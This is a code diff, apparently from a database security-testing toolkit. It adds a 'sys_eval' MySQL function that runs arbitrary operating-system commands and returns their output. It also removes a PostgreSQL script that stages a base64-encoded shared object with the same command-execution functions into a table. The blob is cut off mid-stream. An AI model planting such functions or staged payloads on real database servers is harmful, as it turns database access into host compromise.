-+# modify it under the terms of the GNU Lesser General Public
-+# License as published by the Free Software Foundation; either
-+# version 2.1 of the License, or (at your option) any later version.
-+# 
-+# This library is distributed in the hope that it will be useful,
-+# but WITHOUT ANY WARRANTY; without even the implied warranty of
-+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-+# Lesser General Public License for more details.
-+# 
-+# You should have received a copy of the GNU Lesser General Public
-+# License along with this library; if not, write to the Free Software
-+# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-+
-+echo "Compiling the MySQL UDF"
-+make
-+
-+if test $? -ne 0; then
-+	echo "ERROR: You need libmysqlclient development software installed "
-+	echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
-+	echo "apt-get install libmysqlclient15-dev"
-+	exit 1
-+else
-+	echo "MySQL UDF compiled successfully"
-+fi
-+
-+echo -e "\nPlease provide your MySQL root password"
-+
-+mysql -u root -p mysql < lib_mysqludf_sys.sql
-+
-+if test $? -ne 0; then
-+	echo "ERROR: unable to install the UDF"
-+	exit 1
-+else
-+	echo "MySQL UDF installed successfully"
-+fi
-Binary files lib_mysqludf_sys_0.0.2/lib_mysqludf_sys_0.0.2.tar.gz and lib_mysqludf_sys/lib_mysqludf_sys_0.0.2.tar.gz differ
-diff -uN lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.c lib_mysqludf_sys/lib_mysqludf_sys.c
---- lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.c	2009-01-22 12:01:55.000000000 +0000
-+++ lib_mysqludf_sys/lib_mysqludf_sys.c	2009-01-21 00:06:13.000000000 +0000
-@@ -1,8 +1,9 @@
- /* 
- 	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
- 	Copyright (C) 2007  Roland Bouman 
--	web: http://www.xcdsql.org/MySQL/UDF/ 
--	email: mysqludfs@gmail.com
-+	Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
-+	web: http://www.mysqludf.org/
-+	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
- 	
- 	This library is free software; you can redistribute it and/or
- 	modify it under the terms of the GNU Lesser General Public
-@@ -51,7 +52,7 @@
- extern "C" {
- #endif
- 
--#define LIBVERSION "lib_mysqludf_sys version 0.0.2"
-+#define LIBVERSION "lib_mysqludf_sys version 0.0.3"
- 
- #ifdef __WIN__
- #define SETENV(name,value)		SetEnvironmentVariable(name,value);
-@@ -139,7 +140,7 @@
- /**
-  * sys_exec
-  * 
-- * executes the argument commandstring.
-+ * executes the argument commandstring and returns its exit status.
-  * Beware that this can be a security hazard.
-  */
- DLLEXP 
-@@ -162,6 +163,34 @@
- ,	char *error
- );
- 
-+/**
-+ * sys_eval
-+ * 
-+ * executes the argument commandstring and returns its standard output.
-+ * Beware that this can be a security hazard.
-+ */
-+DLLEXP 
-+my_bool sys_eval_init(
-+	UDF_INIT *initid
-+,	UDF_ARGS *args
-+,	char *message
-+);
-+
-+DLLEXP 
-+void sys_eval_deinit(
-+	UDF_INIT *initid
-+);
-+
-+DLLEXP 
-+char* sys_eval(
-+	UDF_INIT *initid
-+,	UDF_ARGS *args
-+,	char* result
-+,	unsigned long* length
-+,	char *is_null
-+,	char *error
-+);
-+
- 
- #ifdef	__cplusplus
- }
-@@ -336,5 +365,62 @@
- 	return system(args->args[0]);
- }
- 
-+my_bool sys_eval_init(
-+	UDF_INIT *initid
-+,	UDF_ARGS *args
-+,	char *message
-+){
-+	unsigned int i=0;
-+	if(args->arg_count == 1
-+	&& args->arg_type[i]==STRING_RESULT){
-+		return 0;
-+	} else {
-+		strcpy(
-+			message
-+		,	"Expected exactly one string type parameter"
-+		);		
-+		return 1;
-+	}
-+}
-+void sys_eval_deinit(
-+	UDF_INIT *initid
-+){
-+}
-+char* sys_eval(
-+	UDF_INIT *initid
-+,	UDF_ARGS *args
-+,	char* result
-+,	unsigned long* length
-+,	char *is_null
-+,	char *error
-+){
-+	FILE *pipe;
-+	char line[1024];
-+	unsigned long outlen, linelen;
-+
-+	result = malloc(1);
-+	outlen = 0;
-+
-+	pipe = popen(args->args[0], "r");
-+
-+	while (fgets(line, sizeof(line), pipe) != NULL) {
-+		linelen = strlen(line);
-+		result = realloc(result, outlen + linelen);
-+		strncpy(result + outlen, line, linelen);
-+		outlen = outlen + linelen;
-+	}
-+
-+	pclose(pipe);
-+
-+	if (!(*result) || result == NULL) {
-+		*is_null = 1;
-+	} else {
-+		result[outlen] = 0x00;
-+		*length = strlen(result);
-+	}
-+
-+	return result;
-+}
-+
- 
- #endif /* HAVE_DLOPEN */
-diff -uN lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.html lib_mysqludf_sys/lib_mysqludf_sys.html
---- lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.html	2009-01-22 12:01:55.000000000 +0000
-+++ lib_mysqludf_sys/lib_mysqludf_sys.html	2009-01-22 10:21:46.000000000 +0000
-@@ -23,7 +23,8 @@
- 		This library <code>lib_mysqludf_sys</code> contains a number of functions that allows one to interact with the operating system.		
- 	</p>
- 	<ol>
--		<li><a href="#sys_exec"><code>sys_exec</code></a> - executes an arbitrary command, and can thus be used to launch an external application.</li>
-+		<li><a href="#sys_eval"><code>sys_eval</code></a> - executes an arbitrary command, and returns it's output.</li>
-+		<li><a href="#sys_exec"><code>sys_exec</code></a> - executes an arbitrary command, and returns it's exit code.</li>
- 		<li><a href="#sys_get"><code>sys_get</code></a> - gets the value of an environment variable.</li>
- 		<li><a href="#sys_set"><code>sys_set</code></a> - create an environment variable, or update the value of an existing environment variable.</li>
- 	</ol>
-@@ -31,6 +32,72 @@
- 		Use <a href="#lib_mysqludf_sys_info"><code>lib_mysqludf_sys_info()</code></a> to obtain information about the currently installed version of <code>lib_mysqludf_sys</code>.
- 	</p>
- 	
-+
-+	<a name="sys_eval"></a><h2>sys_eval</h2>
-+	<p>
-+		<code>sys_eval</code> takes one command string argument and executes it, returning its output.
-+	</p>
-+	<h3>Syntax</h3>
-+<pre>sys_eval(<b>arg1</b>)</pre>
-+	<h3>Parameters and Return Values</h3>
-+	<dl>
-+		<dt><code><b>arg1</b></code></dt>
-+		<dd>
-+			A command string valid for the current operating system or execution environment.
-+		</dd>
-+		<dt>returns</dt>
-+		<dd>
-+			Whatever output the command pushed to the standard output stream.
-+		</dd>
-+	</dl>
-+	<h3>Installation</h3>
-+	<p>
-+		Place the shared library binary in an appropriate location. 
-+		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-+		Then, create the function using the following DDL statement:
-+	</p>
-+	<pre>
-+CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.so';	
-+	</pre>
-+	<p>
-+		The function will be globally available in all databases.
-+	</p>
-+	<p>
-+		The deinstall the function, run the following statement:
-+	</p>
-+	<pre>
-+DROP FUNCTION sys_eval;
-+	</pre>
-+	<h3>Examples</h3>
-+	<p>
-+		None yet
-+	</p>
-+	<h3>A Note of Caution</h3>
-+	<p>
-+		Be very careful in deciding whether you need this function. 
-+		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-+		As the commandstring passed to <code>sys_exec</code> can do pretty much everything, 
-+		exposing the function poses a very real security hazard.
-+	</p>
-+	<p>
-+		Even for a benign user, it is possible to accidentally do a lot of damage with it.
-+		The call will be executed with the privileges of the os user that runs MySQL, 
-+		so it is entirely feasible to delete MySQL's data directory, or worse.		
-+	</p>
-+	<p>	
-+		The function is intended for specialized MySQL applications where one needs extended 
-+		control over the operating system. 
-+		Currently, we do not have UDF's for ftp, email and http, 
-+		and this function can be used to implement such functionality in case it is really necessary
-+		(datawarehouse staging areas could be a case in example).
-+	</p>
-+	<p>
-+		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-+	</p>
-+	<p>
-+                If you do decide to use this library in a production environment, make sure that only specific commands can be run and file access is limited by using <a href="http://www.novell.com/documentation/apparmor/index.html">AppArmor</a>.
-+	</p>
-+
- 	<a name="sys_exec"></a><h2>sys_exec</h2>
- 	<p>
- 		<code>sys_exec</code> takes one command string argument and executes it.
-@@ -92,6 +159,9 @@
- 	<p>
- 		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
- 	</p>
-+	<p>
-+                If you do decide to use this library in a production environment, make sure that only specific commands can be run and file access is limited by using <a href="http://www.novell.com/documentation/apparmor/index.html">AppArmor</a>.
-+	</p>
- 	<a name="sys_get"></a><h2>sys_get</h2>
- 	<p>
- 		<code>sys_get</code> takes the name of an environment variable and returns the value of the variable.
-Binary files lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.so and lib_mysqludf_sys/lib_mysqludf_sys.so differ
-diff -uN lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.sql lib_mysqludf_sys/lib_mysqludf_sys.sql
---- lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.sql	2009-01-22 12:01:55.000000000 +0000
-+++ lib_mysqludf_sys/lib_mysqludf_sys.sql	2009-01-22 10:21:53.000000000 +0000
-@@ -1,30 +1,33 @@
--/* 
--	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
--	Copyright (C) 2007  Roland Bouman 
--	web: http://www.xcdsql.org/MySQL/UDF/ 
--	email: mysqludfs@gmail.com
--	
--	This library is free software; you can redistribute it and/or
--	modify it under the terms of the GNU Lesser General Public
--	License as published by the Free Software Foundation; either
--	version 2.1 of the License, or (at your option) any later version.
--	
--	This library is distributed in the hope that it will be useful,
--	but WITHOUT ANY WARRANTY; without even the implied warranty of
--	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
--	Lesser General Public License for more details.
--	
--	You should have received a copy of the GNU Lesser General Public
--	License along with this library; if not, write to the Free Software
--	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-+/*
-+        lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-+        Copyright (C) 2007  Roland Bouman
-+        Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
-+        web: http://www.mysqludf.org/
-+        email: roland.bouman@gmail.com, bernardo.damele@gmail.com
-+
-+        This library is free software; you can redistribute it and/or
-+        modify it under the terms of the GNU Lesser General Public
-+        License as published by the Free Software Foundation; either
-+        version 2.1 of the License, or (at your option) any later version.
-+
-+        This library is distributed in the hope that it will be useful,
-+        but WITHOUT ANY WARRANTY; without even the implied warranty of
-+        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-+        Lesser General Public License for more details.
-+
-+        You should have received a copy of the GNU Lesser General Public
-+        License along with this library; if not, write to the Free Software
-+        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
- */
- 
--drop function lib_mysqludf_sys_info;
--drop function sys_get;
--drop function sys_set;
--drop function sys_exec;
-+DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
-+DROP FUNCTION IF EXISTS sys_get;
-+DROP FUNCTION IF EXISTS sys_set;
-+DROP FUNCTION IF EXISTS sys_exec;
-+DROP FUNCTION IF EXISTS sys_eval;
- 
--create function lib_mysqludf_sys_info returns string soname 'lib_mysqludf_sys.so';
--create function sys_get returns string soname 'lib_mysqludf_sys.so';
--create function sys_set returns int soname 'lib_mysqludf_sys.so';
--create function sys_exec returns int soname 'lib_mysqludf_sys.so';
-+CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
-+CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
-+CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
-+CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
-+CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
-diff -uN lib_mysqludf_sys_0.0.2/Makefile lib_mysqludf_sys/Makefile
---- lib_mysqludf_sys_0.0.2/Makefile	2009-01-22 12:01:55.000000000 +0000
-+++ lib_mysqludf_sys/Makefile	2009-01-19 09:11:00.000000000 +0000
-@@ -1,6 +1,4 @@
--linux: \
-- lib_mysqludf_sys.so
-+LIBDIR=/usr/lib
- 
--lib_mysqludf_sys.so: \
-- 
--	gcc -Wall -I/opt/mysql/mysql/include -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
-+install:
-+	gcc -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o $(LIBDIR)/lib_mysqludf_sys.so
-Common subdirectories: lib_mysqludf_sys_0.0.2/.svn and lib_mysqludf_sys/.svn

extra/postgresqludfsys/command_execution/linux.sql

@@ -1,97 +0,0 @@
--- Notes:
--- 
--- The SO compiled using PostgreSQL 8.3 C libraries differs from the one
--- compiled using PostgreSQL 8.2 C libraries
--- 
--- SO compiled using PostgreSQL 8.3 C libraries
--- lib_postgresqludf_sys.so: 8567 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, not stripped)
--- lib_postgresqludf_sys.so: 5476 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped)
--- 
--- SO compiled using PostgreSQL 8.2 C libraries
--- lib_postgresqludf_sys.so: 8567 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, not stripped)
--- lib_postgresqludf_sys.so: 5476 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped)
--- 
--- Little hack to compress the shared object:
--- * Compile with -O1 the shared object
--- * Use strip to remove all symbols (-s) and non-global symbols (-x)
-
-
--- Create a table with one field data-type text
-DROP TABLE IF EXISTS udftest;
-CREATE TABLE udftest(data text);
-
-
--- Insert the base64 encoded UDF in the table
-
--- SO compiled using PostgreSQL 8.3 C libraries
-INSERT INTO udftest(data) VALUES ('f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAYAYAADQAAAB8EQAAAAAAADQAIAAFACgAGQAYAAEAAAAAAAAAAAAAAAAAAAD4CQAA+AkAAAUAAAAAEAAAAQAAAAQPAAAEHwAABB8AAAgBAAAQAQAABgAAAAAQAAACAAAAGA8AABgfAAAYHwAA0AAAANAAAAAGAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAUuV0ZAQPAAAEHwAABB8AAPwAAAD8AAAABAAAAAEAAAARAAAAGgAAAAAAAAANAAAAAAAAAAQAAAAAAAAAAgAAAAcAAAAAAAAAFQAAABcAAAAOAAAADwAAAAwAAAATAAAACAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAwAAAAUAAAAAAAAAEgAAABgAAAAAAAAACQAAABQAAAALAAAAFgAAAAAAAAAAAAAAAAAAABkAAAAAAAAACgAAAAAAAAAQAAAAAAAAABEAAAADAAAAEAAAAAIAAAAGAAAAiACgAQTNRFkQAAAAFgAAABgAAAAuZ1QeqGi+EqpfvhK645J8QkXV7DNeVB7YcVgcuY3xDurT7w7HDabUAAAAAAAAAAAAAAAAAAAAAJAAAAAAAAAAAAAAABIAAADLAAAAAAAAAAAAAAAQAAAAAQAAAAAAAAAAAAAAIAAAACsAAAAAAAAAAAAAACAAAACWAAAAAAAAAAAAAAASAAAAxAAAAAAAAAAAAAAAEgAAAJ4AAAAAAAAAAAAAABIAAACmAAAAAAAAAAAAAAASAAAAzAAAAAAAAAAAAAAAEgAAAIkAAAAAAAAAAAAAABIAAACCAAAAAAAAAAAAAAASAAAAswAAAAAAAAAAAAAAEgAAABwAAAAAAAAAA');
-UPDATE udftest SET data=data||'AAAACIAAACsAAAAAAAAAAAAAAASAAAAcQAAAAAAAAAAAAAAEAAAAE0AAAAmBwAACgAAABIACwBWAAAAAAkAAHwAAAASAAsAaAAAADoHAADGAQAAEgALAO4AAAAUIAAAAAAAABAA8f/bAAAADCAAAAAAAAAQAPH/XwAAADAHAAAKAAAAEgALAOIAAAAMIAAAAAAAABAA8f8QAAAA+AUAAAAAAAASAAkAFgAAALgJAAAAAAAAEgAMAD8AAAAcBwAACgAAABIACwAAX19nbW9uX3N0YXJ0X18AX2luaXQAX2ZpbmkAX19jeGFfZmluYWxpemUAX0p2X1JlZ2lzdGVyQ2xhc3NlcwBQZ19tYWdpY19mdW5jAHBnX2ZpbmZvX3N5c19leGVjAHBnX2ZpbmZvX3N5c19ldmFsAHBnX2RldG9hc3RfZGF0dW0AbWFsbG9jAG1lbWNweQBwb3BlbgByZWFsbG9jAHN0cm5jcHkAZmdldHMAcGNsb3NlAF9fc3RhY2tfY2hrX2ZhaWwAc3lzdGVtAHBmcmVlAGxpYmMuc28uNgBfZWRhdGEAX19ic3Nfc3RhcnQAX2VuZABHTElCQ18yLjEuMwBHTElCQ18yLjQAR0xJQkNfMi4wAEdMSUJDXzIuMQAAAAACAAAAAAAAAAMAAwADAAMAAwADAAMABAAFAAIAAAABAAEAAQABAAEAAQABAAEAAQABAAAAAQAEANEAAAAQAAAAAAAAAHMfaQkAAAUA8wAAABAAAAAUaWkNAAAEAP8AAAAQAAAAEGlpDQAAAwAJAQAAEAAAABFpaQ0AAAIAEwEAAAAAAAAgBwAACAAAACoHAAAIAAAANAcAAAgAAACjBwAACAAAAAggAAAIAAAAWwcAAAIPAAAZCQAAAg8AAHAHAAACCwAAlQ';
-UPDATE udftest SET data=data||'cAAAILAACNCAAAAgsAAC4JAAACCwAAhQcAAAIKAADaCAAAAgoAAEMJAAACCgAAqwcAAAIBAADwBwAAAgUAABgIAAACBwAAPggAAAIIAABUCAAAAg4AAPEIAAACDAAATwkAAAIGAABZCQAAAgkAAGkJAAACAgAA6B8AAAYDAADsHwAABgQAAPAfAAAGDQAAACAAAAcDAAAEIAAABw0AAFWJ5VOD7AToAAAAAFuBw/AZAACLk/T///+F0nQF6B4AAADowQAAAOhcAwAAWFvJw/+zBAAAAP+jCAAAAAAAAAD/owwAAABoAAAAAOng/////6MQAAAAaAgAAADp0P///wAAAAAAAAAAVYnlVlPorQAAAIHDihkAAIPsEIC7GAAAAAB1XYuD/P///4XAdA6LgxQAAACJBCTotP///4uLHAAAAI2DHP///42TGP///ynQwfgCjXD/OfFzII22AAAAAI1BAYmDHAAAAP+Ugxj///+LixwAAAA58XLmxoMYAAAAAYPEEFteXcNVieVT6C4AAACBwwsZAACD7ASLkyD///+F0nQVi5P4////hdJ0C42DIP///4kEJP/Sg8QEW13Dixwkw5BVieW44AkAAF3DVYnluNwJAABdw1WJ5bjYCQAAXcNVieVXVlOB7CwEAABloRQAAACJRfAxwItFCItAEIkEJOj8////iceLAMHoAo1w/IPoA4kEJOj8////icONRwSJdCQIiUQkBIkcJOj8////xgQzAMcEJAEAAADo/P///4mF2Pv//8dEJATUCQAAiRwk6Pz///+Jhdz7///HheD7//8AAAAA62GNvfD7//+4AAAAALn/////8q6JyPfQjXD/i53g+///AfOJXCQEi5XY+///iRQk6Pz///+Jhdj7//+JdCQIjYXw+///iUQ';
-UPDATE udftest SET data=data||'kBIuF2Pv//wOF4Pv//4kEJOj8////iZ3g+///i5Xc+///iVQkCMdEJAQABAAAjYXw+///iQQk6Pz///+FwA+Fd////4uV3Pv//4kUJOj8////i4XY+///gDgAdAuLleD7///GRBD/AL7/////i73Y+///uwAAAACJ8YnY8q730YPBA4kMJOj8////iYXU+///i73Y+///ifGJ2PKu99GNDI0MAAAAi5XU+///iQqLvdj7//+J8fKu99GD6QGJ0IPABIlMJAiLldj7//+JVCQEiQQk6Pz///+LhdT7//+LVfBlMxUUAAAAdAXo/P///4HELAQAAFteX13DVYnlg+wYiV30iXX4iX38i1UIi0IQiQQk6Pz///+Jx4sAwegCjXD8g+gDiQQk6Pz///+Jw41HBIl0JAiJRCQEiRwk6Pz////GBDMAiRwk6Pz///+JxokcJOj8////i0UIO3gQdAiJPCTo/P///4nwi130i3X4i338iexdw5CQkJBVieVWU+iN/f//gcNqFgAAi4MQ////g/j/dBmNsxD///+NtCYAAAAAg+4E/9CLBoP4/3X0W15dw1WJ5VOD7AToAAAAAFuBwzAWAADokPz//1lbycNyAAAAAQAAAAEAAAAUAAAAIwMAAGQAAAAgAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////8AAAAA/////wAAAAAAAAAAAQAAANEAAAAMAAAA+AUAAA0AAAC4CQAABAAAANQAAAD1/v9viAEAAAUAAAB0AwAABgAAANQBAAAKAAAAHQEAAAsAAAAQAAAAAwAAAPQfAAACAAAAEAAAABQAAAARAAAAFwAAAOgFAAARAAAAGAUAABIAAADQAAAAEwAAAAgAAAAWAAAAAAAAAP7//2/IBAAA////bwEAAADw//9vkgQAAPr//28FAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgfAAAAAAAAAAAAAD4GAABOBgAACCAAAA';
-UPDATE udftest SET data=data||'BHQ0M6IChVYnVudHUgNC4zLjItMXVidW50dTEyKSA0LjMuMgAAR0NDOiAoVWJ1bnR1IDQuMy4yLTF1YnVudHUxMikgNC4zLjIAAEdDQzogKFVidW50dSA0LjMuMi0xdWJ1bnR1MTIpIDQuMy4yAABHQ0M6IChVYnVudHUgNC4zLjItMXVidW50dTEyKSA0LjMuMgAAR0NDOiAoVWJ1bnR1IDQuMy4yLTF1YnVudHUxMikgNC4zLjIAAC5zaHN0cnRhYgAuZ251Lmhhc2gALmR5bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBsdAAuaW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5laF9mcmFtZQAuY3RvcnMALmR0b3JzAC5qY3IALmR5bmFtaWMALmdvdAAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAFAAAAAgAAANQAAADUAAAAtAAAAAMAAAAAAAAABAAAAAQAAAALAAAA9v//bwIAAACIAQAAiAEAAEwAAAADAAAAAAAAAAQAAAAEAAAAFQAAAAsAAAACAAAA1AEAANQBAACgAQAABAAAAAEAAAAEAAAAEAAAAB0AAAADAAAAAgAAAHQDAAB0AwAAHQEAAAAAAAAAAAAAAQAAAAAAAAAlAAAA////bwIAAACSBAAAkgQAADQAAAADAAAAAAAAAAIAAAACAAAAMgAAAP7//28CAAAAyAQAAMgEAABQAAAABAAAAAEAAAAEAAAAAAAAAEEAAAAJAAAAAgAAABgFAAAYBQAA0AAAAAMAAAAAAAAABAAAAAg';
-UPDATE udftest SET data=data||'AAABKAAAACQAAAAIAAADoBQAA6AUAABAAAAADAAAACgAAAAQAAAAIAAAAUwAAAAEAAAAGAAAA+AUAAPgFAAAwAAAAAAAAAAAAAAAEAAAAAAAAAE4AAAABAAAABgAAACgGAAAoBgAAMAAAAAAAAAAAAAAABAAAAAQAAABZAAAAAQAAAAYAAABgBgAAYAYAAFgDAAAAAAAAAAAAABAAAAAAAAAAXwAAAAEAAAAGAAAAuAkAALgJAAAcAAAAAAAAAAAAAAAEAAAAAAAAAGUAAAABAAAAAgAAANQJAADUCQAAIAAAAAAAAAAAAAAABAAAAAAAAABtAAAAAQAAAAIAAAD0CQAA9AkAAAQAAAAAAAAAAAAAAAQAAAAAAAAAdwAAAAEAAAADAAAABB8AAAQPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAH4AAAABAAAAAwAAAAwfAAAMDwAACAAAAAAAAAAAAAAABAAAAAAAAACFAAAAAQAAAAMAAAAUHwAAFA8AAAQAAAAAAAAAAAAAAAQAAAAAAAAAigAAAAYAAAADAAAAGB8AABgPAADQAAAABAAAAAAAAAAEAAAACAAAAJMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABAAAAAQAAACYAAAAAQAAAAMAAAD0HwAA9A8AABQAAAAAAAAAAAAAAAQAAAAEAAAAoQAAAAEAAAADAAAACCAAAAgQAAAEAAAAAAAAAAAAAAAEAAAAAAAAAKcAAAAIAAAAAwAAAAwgAAAMEAAACAAAAAAAAAAAAAAABAAAAAAAAACsAAAAAQAAAAAAAAAAAAAADBAAALkAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAMAAAAAAAAAAAAAAMUQAAC1AAAAAAAAAAAAAAABAAAAAAAAAA==';
-
--- SO compiled using PostgreSQL 8.2 C libraries
--- INSERT INTO udftest(data) VALUES ('f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAYAYAADQAAAB8EQAAAAAAADQAIAAFACgAGQAYAAEAAAAAAAAAAAAAAAAAAAD4CQAA+AkAAAUAAAAAEAAAAQAAAAQPAAAEHwAABB8AAAgBAAAQAQAABgAAAAAQAAACAAAAGA8AABgfAAAYHwAA0AAAANAAAAAGAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAUuV0ZAQPAAAEHwAABB8AAPwAAAD8AAAABAAAAAEAAAARAAAAGgAAAAAAAAANAAAAAAAAAAQAAAAAAAAAAgAAAAcAAAAAAAAAFQAAABcAAAAOAAAADwAAAAwAAAATAAAACAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAwAAAAUAAAAAAAAAEgAAABgAAAAAAAAACQAAABQAAAALAAAAFgAAAAAAAAAAAAAAAAAAABkAAAAAAAAACgAAAAAAAAAQAAAAAAAAABEAAAADAAAAEAAAAAIAAAAGAAAAiACgAQTNRFkQAAAAFgAAABgAAAAuZ1QeqGi+EqpfvhK645J8QkXV7DNeVB7YcVgcuY3xDurT7w7HDabUAAAAAAAAAAAAAAAAAAAAAJAAAAAAAAAAAAAAABIAAADLAAAAAAAAAAAAAAAQAAAAAQAAAAAAAAAAAAAAIAAAACsAAAAAAAAAAAAAACAAAACWAAAAAAAAAAAAAAASAAAAxAAAAAAAAAAAAAAAEgAAAJ4AAAAAAAAAAAAAABIAAACmAAAAAAAAAAAAAAASAAAAzAAAAAAAAAAAAAAAEgAAAIkAAAAAAAAAAAAAABIAAACCAAAAAAAAAAAAAAASAAAAswAAAAAAAAAAAAAAEgAAABwAAAAAAAAAA');
